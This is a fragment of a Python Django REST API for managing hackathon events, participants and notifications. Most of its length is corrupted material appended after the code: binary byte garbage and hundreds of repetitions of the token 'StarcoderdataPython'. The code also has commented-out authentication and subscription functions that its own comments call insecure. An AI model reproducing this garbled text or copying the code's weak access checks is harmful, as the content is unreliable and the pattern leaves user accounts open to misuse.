'Null' class EventManage(APIView): authentication_classes = (TokenAuthentication,) permission_classes = (IsAuthenticated,) def get(self, request, ev_id): event = Event.objects.get(id=ev_id) serialized = DetailsEventSerializer(event) return Response(serialized.data) def post(self, request, ev_id): event = Event.objects.get(id=ev_id) event.title = request.data['title'] event.date_start = request.data['date_start'] event.date_end = request.data['date_end'] event.descreption = request.data['descreption'] event.theme = request.data['theme'] event.manual_validation = request.data['validation'] event.save() return Response('Object updated') def delete(self, request, ev_id): event = Event.objects.get(id=ev_id) groups = WorkGroups.objects.filter(event=event) if (len(groups) > 0): for item in groups: item.users.remove() try: project = Projects.objects.get(group=item) project.files.remove() project.delete() except: pass item.delete() try: process = Hackproces.objects.get(for_event=event) process.outil_used.remove() process.delete() except: pass event.delete() return Response('Delete completed') class EventList(APIView): # Only Authenticated users has access # authentication_classes = (TokenAuthentication,) # permission_classes = (IsAuthenticated,) def get(self, request): resp = None; listPilot = Pilot.objects.filter(user=request.user.id).values_list('id', flat=True) for item in listPilot: events = Event.objects.filter(hackathon_id=item) resp = DetailsEventSerializer(events, many=True) return Response(resp.data) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '0': response = self.event_applied() # elif fonction == '1': # response = self.upcoming_events(request) elif fonction == '2': response = self.subscribtion_status(request.data) elif fonction == '3': response = self.user_per_event(request.data) elif fonction == '4': response = self.addEvent(request) elif fonction == '5': users = User.objects.filter(email__icontains=request.data['applicant_search']).exclude( eventparticipation__event__id=request.data['event_id']) response = [ {'id': u.id, 'mail': u.email, 'actived': u.is_active, 'name': u.get_full_name()} for u in users.iterator() ] elif fonction == '6': response = self.confirmed_user_per_event(request.data) # elif fonction == '7': # response = self.upcoming_events_count(request.data) return Response(response) def addEvent(self, request): manual = request.data['manual_validation'].lower() == 'true' Sdate = request.data['Sdate'].replace('"', '') Edate = request.data['Edate'].replace('"', '') pilotid = request.data['pilotid'].replace('"', '') timezone.deactivate() pilot = Pilot.objects.get(id=pilotid) newEvent = Event(hackathon=pilot, title=request.data['title'], theme=request.data['theme'], descreption=request.data['descreption'], date_start=Sdate, date_end=Edate, image=request.FILES['path'], manual_validation=manual) srcA = newEvent.save() return 'sucess' def event_applied(self): record = EventParticipation.objects.filter(status='pending').order_by('event_id').values_list('event_id', flat=True).distinct() my_list = [] for line in record: event = Event.objects.filter(id=line).values('id', 'title', 'theme', 'date_start') my_list.extend(event) return my_list def user_per_event(self, request): part = EventParticipation.objects.select_related('participant').filter(event_id=request['event'], status='pending') mylista = [] for ele_part in part: data = {'id': ele_part.participant.id, 'mail': ele_part.participant.email, 'actived': ele_part.participant.is_active, 'name': ele_part.participant.first_name + ' ' + ele_part.participant.last_name} mylista.append(data) return mylista def confirmed_user_per_event(self, request): part = EventParticipation.objects.select_related('participant').filter(event_id=request['event_id'], status='confirmed') # return User.objects.filter(##FILL_OUT_HERE##).values('id', 'email', 'activated', 'name') mylista = [] for ele_part in part: data = {'id': ele_part.participant.id, 'mail': ele_part.participant.email, 'actived': ele_part.participant.is_active, 'name': ele_part.participant.first_name + ' ' + ele_part.participant.last_name} mylista.append(data) return mylista def subscribtion_status(self, request): try: upcoming = EventParticipation.objects.get(participant_id=request['participant'], event_id=request['event']) return upcoming.status except: return 'none' def applied_for_event(self, request): record = Event.objects.distinct('event_id') query = record.hackathon_set.all() return query class GroupsCount(APIView): def get(self, request): listA = [] hackID = Pilot.objects.filter(user=request.user.id).values_list('id', flat=True) events = Event.objects.filter(hackathon_id=hackID) for item in events: listB = [] count = WorkGroups.objects.filter(event_id=item.id).count() listB.append({'event': item.id, 'group': count}) listA.extend(listB) return Response(listA) class EventOrganization(APIView): def get(self, request): record = Pilot.objects.filter(user=request.user.id).values_list('user__id', 'id') # ser = DetailsPilotSerializer(record, many=True) return Response(record) def post(self, request): fonction = request.data['fonc'] response = any if fonction == '1': response = self.subscribed_hacks(request) elif fonction == '2': response = self.subscribeToevent(request.data) elif fonction == '3': response = self.acceptApplicant(request) elif fonction == '4': response = self.refusApplicant(request.data) elif fonction == '5': response = self.delete_eventparticipant(request.data) print(response) elif fonction == '6': response = self.subscribeToeventEmail(request.data) elif fonction == '7': response = self.upcoming_events(request) return Response(response) def acceptApplicant(self, request): event = Event.objects.get(id=request.data['eventID']) even_title = event.title #print(str(request.user)) #print('=Z> '+str(request.data['userId'])) record = EventParticipation.objects.get(participant=request.data['userId'], event_id=request.data['eventID']) record.status = 'confirmed' record.save() inputs = {'status': 1, 'recepiant': request.data['mail'], 'title': even_title} self.sendNotif(inputs) return 'success' def refusApplicant(self, request): event = Event.objects.get(id=request['eventID']) even_title = event.title record = EventParticipation.objects.get(participant=request.user, event_id=request['eventID']) record.status = 'rejected' record.save() inputs = {'status': 0, 'recepiant': request['mail'], 'title': even_title} self.sendNotif(inputs) return 'success' def subscribed_hacks(self, request): hacks = EventParticipation.objects.filter(participant=request.user).exclude(event__date_end__lt=datetime.now()).order_by( '-event__date_start' ) if hacks.count() == 0: return EventParticipation.objects.none() paginator = Paginator(hacks, int(request.data['amount'])) page = int(request.data['page']) paginatedhacks = paginator.page(page).object_list return {'hacks': paginatedhacks.values( 'event_id', 'event__title', 'event__date_start', 'event__date_end', 'event__hackathon_id', 'status', 'event__image' ), 'max_page': paginator.num_pages, 'total_count': hacks.count()} def upcoming_events(self, request): """Get all upcoming_events that have a hack process where the user is not allready subscribed""" # Get upcoming_events with a hack proces and no participation by the current user events = Event.objects.exclude( hackproces=None ).exclude( eventparticipation__participant=request.user ).exclude(date_end__lt=datetime.now()) if events.count() == 0: return {'hacks': [], 'max_page': 0, 'total_count': 0} # Create paginator paginator = Paginator(events, request.data['amount']) page = paginator.page(request.data['page']) # Return return {'hacks': DetailsEventSerializer(page.object_list, many=True).data, 'max_page': paginator.num_pages, 'total_count': events.count()} # This function is not recomnded --> need to be changed in the future for security reason def subscribeToevent(self, request): eventlink = Event.objects.get(id=request['eventid']) userlink = User.objects.get(id=request['participantid']) if eventlink.manual_validation: status = request['status'] else: status = 'confirmed' subscribtion = EventParticipation(event=eventlink, participant=userlink, status=status) subscribtion.save() res = 'success' return res # This function is not recomnded --> need to be changed in the future for security reason def subscribeToeventEmail(self, request): print(request) eventlink = Event.objects.get(id=request['eventid']) userlink = User.objects.get(email=request['participantemail']) subscribtion = EventParticipation(event=eventlink, participant=userlink, status=request['status']) subscribtion.save() res = 'success' return res def delete_eventparticipant(self, data): print('deleting') EventParticipation.objects.filter(event_id=data['event_id'], participant_id=data['participant_id']).delete() print('deleted') res = 'success' return res def sendNotif(self, request): mail = request['recepiant'] situation = request['status'] notif = any if situation == 0: notif = ' unfortunately the numbers of applicant is atteint so you request has been rejected.' else: notif = ' your request has been accepted. Please be at the venue in time.' if (send_mail( 'About your request to attend ' + request['title'], 'Thank you for your interest and request to attend,' + notif, settings.EMAIL_HOST_USER, [mail], fail_silently=False )): return '200' return '350' &9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv������� ! 4 G Z m � � � � � � �   + > Q d w � � � � � � �  " 5 H [ n � � � � � � �   , ? R e x � � � � � � �  # 6 I \ o � � � � � � � -@Sfy�������$7J]p�������.ATgz�������%8K^q������� /BUh{������&9L_r������� 0CVi|������':M`s������� 1DWj}������(;Nat������� 2EXk~������)<Obu�������  3FYl������*=Pcv�������!4GZm�������+>Qdw�������"5H[n�������,?Rex������� # 6 I \ o � � � � � � � !!-!@!S!f!y!�!�!�!�!�!�!�!"$"7"J"]"p"�"�"�"�"�"�"�"##.#A#T#g#z#�#�#�#�#�#�#�#$%$8$K$^$q$�$�$�$�$�$�$�$ %%/%B%U%h%{%�%�%�%�%�%�%&&&&9&L&_&r&�&�&�&�&�&�&�& ''0'C'V'i'|'�'�'�'�'�'�'(('(:(M(`(s(�(�(�(�(�(�(�( ))1)D)W)j)})�)�)�)�)�)�)**(*;*N*a*t*�*�*�*�*�*�*�* ++2+E+X+k+~+�+�+�+�+�+�+,,),<,O,b,u,�,�,�,�,�,�,�, - -3-F-Y-l--�-�-�-�-�-�-..*.=.P.c.v.�.�.�.�.�.�.�./!/4/G/Z/m/�/�/�/�/�/�/�/00+0>0Q0d0w0�0�0�0�0�0�0�01"151H1[1n1�1�1�1�1�1�1�122,2?2R2e2x2�2�2�2�2�2�2�23#363I3\3o3�3�3�3�3�3�3�344-4@4S4f4y4�4�4�4�4�4�4�45$575J5]5p5�5�5�5�5�5�5�566.6A6T6g6z6�6�6�6�6�6�6�67%787K7^7q7�7�7�7�7�7�7�7 88/8B8U8h8{8�8�8�8�8�8�899&999L9_9r9�9�9�9�9�9�9�9 ::0:C:V:i:|:�:�:�:�:�:�:;;';:;M;`;s;�;�;�;�;�;�;�; <<1<D<W<j<}<�<�<�<�<�<�<==(=;=N=a=t=�=�=�=�=�=�=�= >>2>E>X>k>~>�>�>�>�>�>�>??)?CQCdCwC�C�C�C�C�C�C�CD"D5DHD[DnD�D�D�D�D�D�D�DEE,E?EREeExE�E�E�E�E�E�E�EF#F6FIF\FoF�F�F�F�F�F�F�FGG-G@GSGfGyG�G�G�G�G�G�G�GH$H7HJH]HpH�H�H�H�H�H�H�HII.IAITIgIzI�I�I�I�I�I�I�IJ%J8JStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPythonStarcoderdataPython����  0('   �@   � "X�&h�&h�& p�&�*@@@ ")19AHOV]dkrz������������������� #*18?FMU\chpw������������������ "*18?FMT[ahpw������������������ !(07?FMU[ahnu|������������������ %+2:AHOW^elt{�������������������#*29?EKQX_flsz������������������ ")08@GMT\ckqy������������������$+3:AIPX^eltz������������������� !(/6>ELT[ahpw~�����������������   ! ( / 6 = D K R Z b i p w ~ � � � � � � � � � � � � � � � � � �    ! ' . 5 < C J Q X _ f m t { � � � � � � � � � � � � � � � � � �     & . 5 < C K R Y ` h o w ~ � � � � � � � � � � � � � � � � � �    # ) 1 8 ? F M T Z a i q y � � � � � � � � � � � � � � � � � � �    " ( / 7 > D K R Y ` g 